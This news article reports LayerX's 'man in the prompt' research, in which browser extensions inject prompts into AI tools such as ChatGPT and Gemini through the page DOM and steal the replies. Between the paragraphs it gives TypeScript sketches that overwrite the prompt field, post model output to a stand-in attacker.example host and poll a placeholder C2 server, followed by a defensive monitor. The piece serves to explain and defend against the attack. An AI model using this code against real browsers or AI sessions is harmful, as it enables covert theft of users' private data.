An innovative prompt injection attack can let an attacker steal your data using nothing but a browser extension.
Browser security vendor LayerX published research today detailing an attack it discovered that exploits a “weakness” in how browser instances of AI tools interact with the Web browser itself. Called “man in the prompt,” the exploit relies on the fact that for many generative AI/LLM-powered tools, the input field is part of the page’s Document Object Model (DOM), the programming interface browsers use to represent and manipulate a page’s structure and content.
Because browser extensions can run with extensive permissions in a Web browser, and because they also rely on the DOM, LayerX said, “any browser extension with scripting access to the DOM can read from, or write to, the AI prompt directly.” That’s where the opportunity for attackers comes in.
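To see why DOM access alone is enough, consider the minimal content-script sketch below. It is illustrative only: the selector is a hypothetical placeholder rather than the real markup of any particular AI tool, and LayerX has not published its exploit code.

```typescript
// content-script.ts -- illustrative sketch only. "#prompt-textarea" is a
// hypothetical placeholder, not the actual markup of any specific AI tool.
const PROMPT_SELECTOR = "#prompt-textarea";

// Read whatever the user has typed into the AI prompt field.
function readPrompt(): string | null {
  const field = document.querySelector<HTMLElement>(PROMPT_SELECTOR);
  return field ? field.textContent : null;
}

// Overwrite the prompt field with attacker-chosen text.
function writePrompt(text: string): void {
  const field = document.querySelector<HTMLElement>(PROMPT_SELECTOR);
  if (!field) return;
  field.textContent = text;
  // Fire an input event so the page's framework registers the change.
  field.dispatchEvent(new Event("input", { bubbles: true }));
}
```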
“LayerX’s research shows that any browser extension, even without any special permissions, can access the prompts of both commercial and internal LLMs and inject them with prompts to steal data, exfiltrate it, and cover their tracks,” according to the research, which was shared exclusively with Dark Reading.
Though it is not a vulnerability involving a specific model or product, LayerX claimed that multiple models, including ChatGPT, Gemini, DeepSeek, Copilot, and Claude, are susceptible to two versions of the attack.
Man in the Prompt: How It Works
Attackers can execute the exploit in multiple ways, such as via a browser extension installed post-exploitation, an extension unwittingly installed via a social engineering method like phishing or typosquatting, or an extension the user already has installed that the attacker purchased access to and then poisoned.
In this last case, no action on the part of the user is necessary. This doesn’t appear to be a far-fetched scenario either, as Chrome Web Store (to name one example) has a whole class of extensions that include prompt writing, reading, and editing as part of their feature sets.
Once the attacker has access to an extension inside a user’s vulnerable browser, the extension can communicate with generative AI (GenAI) tools, inject prompts, and read them. The most obvious risk here is data leakage and theft: depending on the tool, an attacker could gain access to personally identifiable information, folder and file contents, and more.
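Reading the model’s output and shipping it off-site is similarly compact. The sketch below is a hypothetical illustration, not LayerX’s code; the response selector and collection endpoint are invented placeholders.

```typescript
// Illustrative exfiltration sketch. ".assistant-message" and the URL are
// invented placeholders, not real application markup or attacker infrastructure.
const RESPONSE_SELECTOR = ".assistant-message";
const EXFIL_URL = "https://attacker.example/log";

// Watch the page for new content and post the latest model reply off-site.
const observer = new MutationObserver(() => {
  const replies = document.querySelectorAll(RESPONSE_SELECTOR);
  const latest = replies[replies.length - 1]?.textContent;
  if (latest) {
    void fetch(EXFIL_URL, { method: "POST", body: latest });
  }
});
observer.observe(document.body, { childList: true, subtree: true });
```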
Internal LLMs are particularly exposed because they, as the research noted, “are often trained or augmented with highly sensitive, proprietary organizational data,” such as legal documents, internal communications, source code, intellectual property, financial forecasts, corporate strategy, and so on.
These internal LLMs also have a high level of trust from a security perspective, as well as fewer query guardrails.
The research includes proof-of-concept (PoC) exploits for both ChatGPT and Gemini.
In the former, the user installs a compromised extension with no permissions enabled. A command-and-control (C2) server sends a query to the extension, which opens a background tab and queries ChatGPT. The results are exfiltrated to an external log, and the extension deletes the relevant chat history to cover its tracks.
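LayerX did not release the PoC code itself, but the flow it describes maps onto ordinary extension plumbing. The hypothetical background-script sketch below shows the general shape; the C2 URL is a placeholder, and the actual prompt injection and history cleanup would be handled by a content script along the lines of the earlier sketches.

```typescript
// background.ts -- a hypothetical reconstruction of the described flow, not
// LayerX's actual PoC. The C2 URL is an invented placeholder.
const C2_URL = "https://c2.example/next-task";

async function pollC2(): Promise<void> {
  const task = await (await fetch(C2_URL)).json(); // e.g. { query: "..." }
  if (!task?.query) return;

  // Open the AI tool in an unfocused background tab. Creating a tab
  // requires no special extension permission.
  const tab = await chrome.tabs.create({
    url: "https://chatgpt.com/",
    active: false,
  });

  // Hand the attacker's query to the content script in that tab, which
  // injects it into the prompt, reads the answer, and deletes the chat.
  // (A real flow would wait for the tab to finish loading first.)
  if (tab.id !== undefined) {
    chrome.tabs.sendMessage(tab.id, { type: "inject", query: task.query });
  }
}

// Simplified polling loop; a production MV3 service worker would use the
// chrome.alarms API instead to survive worker suspension.
setInterval(pollC2, 60_000);
```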
The Gemini PoC relies on the fact that, by default, Gemini has access to all data accessible to the end user in Google Workspace, like email, documents, contacts, and all shared files and folders the user has permissions for. The Gemini integration into Workspace also includes a sidebar in Google apps, allowing the user to automate certain functions.
“The new Gemini integration is implemented directly within the page as added code on top of the existing page. It modifies and directly writes to the web application’s Document Object Model (DOM), giving it control and access to all functionality within the application,” LayerX said in its research.
“LayerX has found that the way this integration is implemented, any browser extension, without any special extension permissions, can interact with the prompt, and inject prompts into it. As a result, practically any extension can access the Gemini sidebar prompt and query it for any data it desires,” the researchers added.
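In other words, the same DOM-level tricks shown earlier apply to the sidebar. The sketch below is a hypothetical illustration of what such a query could look like; the selector and the example question are invented, not details from LayerX’s Gemini PoC.

```typescript
// Hypothetical sketch of abusing an in-page AI sidebar. The selector and
// example query are invented, not taken from LayerX's Gemini PoC.
const SIDEBAR_PROMPT = "[contenteditable='true'][aria-label*='prompt' i]";

function querySidebar(question: string): void {
  const box = document.querySelector<HTMLElement>(SIDEBAR_PROMPT);
  if (!box) return;
  box.textContent = question; // e.g. "List the files shared with me this week"
  box.dispatchEvent(new Event("input", { bubbles: true }));
  // Submitting the prompt and scraping the answer would follow the same
  // DOM-level pattern as the earlier exfiltration sketch.
}
```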
Risk and Mitigation
LayerX CEO and co-founder Or Eshed tells Dark Reading he has “no doubt” attackers will exploit this attack. “The potential use cases and scenarios for this attack are infinite,” he says. “It’s a very low-hanging fruit.”
But while the potential for exploitation is high, and while traditional security tools don’t have visibility into DOM-level interactions, Eshed explains that on the defender side, the browser is “manageable and achievable to secure with either browser protection or more secure AI applications.”
LayerX said in its research that defenders should monitor DOM interactions within their GenAI tools via listeners or webhooks, and also block risky extensions based on behavioral risk rather than allowlists. Organizations should also regularly audit the extensions in their environment, as well as the permissions those extensions have.
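On the monitoring point, one rough way to get DOM-level visibility is a MutationObserver attached to the prompt element itself. The sketch below uses a naive keystroke-correlation heuristic of its own (not something LayerX prescribes), and the selector is again a hypothetical placeholder; treat it as a starting point rather than a finished control.

```typescript
// Defender-side sketch: flag writes to a GenAI prompt field that don't
// coincide with user keystrokes. "#prompt-textarea" is a placeholder for
// whatever element the tool actually uses; the heuristic is deliberately naive.
const PROMPT_SELECTOR = "#prompt-textarea";
let userIsTyping = false;

document.addEventListener("keydown", () => { userIsTyping = true; });
document.addEventListener("keyup", () => {
  setTimeout(() => { userIsTyping = false; }, 200);
});

const watcher = new MutationObserver((mutations) => {
  if (!userIsTyping && mutations.length > 0) {
    // Prompt content changed with no recent keystrokes: a possible
    // extension-driven injection. Forward this to your own telemetry.
    console.warn("Unattended write to AI prompt field", mutations);
  }
});

const field = document.querySelector(PROMPT_SELECTOR);
if (field) {
  watcher.observe(field, { childList: true, characterData: true, subtree: true });
}
```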